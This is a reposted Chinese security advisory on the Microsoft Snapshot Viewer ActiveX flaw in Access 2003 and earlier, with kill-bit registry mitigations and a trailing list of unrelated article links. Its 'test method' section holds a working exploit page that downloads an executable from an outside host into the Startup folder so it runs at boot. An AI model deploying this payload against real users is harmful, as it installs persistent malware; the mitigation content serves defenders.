MS Office Snapshot Viewer ActiveX Exploit
来源:互联网 发布:广岛大学知乎 编辑:程序博客网 时间:2024/06/05 15:37
影响系统:
详细:
受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.
Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.
测试方法:
推荐的应对方法:
目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:
[url=http://www.microsoft.com/technet/security/]http://www.microsoft.com/t...[/url]
将以下CLSID设置KILLBIT:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622
详细:
受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.
Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.
测试方法:
- <html>
- <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
- <script language='javascript'>
- var buf1 = 'http://xgymcn.5d6d.com/test.exe';
- var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
- obj.SnapshotPath = buf1;
- obj.CompressedPath = buf2;
- obj.PrintSnapshot();
- </script>
- </html>
推荐的应对方法:
目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:
[url=http://www.microsoft.com/technet/security/]http://www.microsoft.com/t...[/url]
将以下CLSID设置KILLBIT:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
- MS Office Snapshot Viewer ActiveX Exploit
- MS Office Snapshot Viewer ActiveX Exploit 最新网马
- Microsoft Office Snapshot Viewer ActiveX Exploit
- Edraw Office Viewer Component
- 使用Apache POI和Java获得Excel文件内容,无须MS-Office ActiveX OLE
- 使用TextMiniing和Apache POI获得Word文件内容,无须MS-Office ActiveX
- 使用Apache POI和Java获得Excel文件内容,无须MS-Office ActiveX OLE
- Edraw Office Viewer component教程(三):将MS Word、Excel、PowerPoint嵌入到WPF应用程序中
- PDF Viewer Component ActiveX DoS
- Sina UC 2006 Activex SendChatRoomOpt Exploit
- BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit
- MS-4011Exploit漏洞攻击的解决方法
- MS Windows GDI Local Privilege Escalation Exploit
- 解决MS-4011 Exploit漏洞报警
- 卸载ms office 2007
- MS Office开发工具
- MS Office Discussion Bar
- Automating MS-Office applications
- 转:PostMessage函数介绍
- 在Spring框架下对数据库连接的配置信息加密
- 图解SQL多表关联查询
- XDriveBar - Display drive buttons in a fixed toolbar
- web页面生成word文档
- MS Office Snapshot Viewer ActiveX Exploit
- vs 2005 中TreeView 控件checkbox 的回发事件
- ADO.NET2.0的十大新特性
- MS Office Snapshot Viewer ActiveX Exploit 最新网马
- 连续两起女司机勇追劫匪的事件的一个观点
- ilist dataset
- 数据库的查询优化技术
- 菜单被select遮住的解决方案
- C#模拟MSN窗体抖动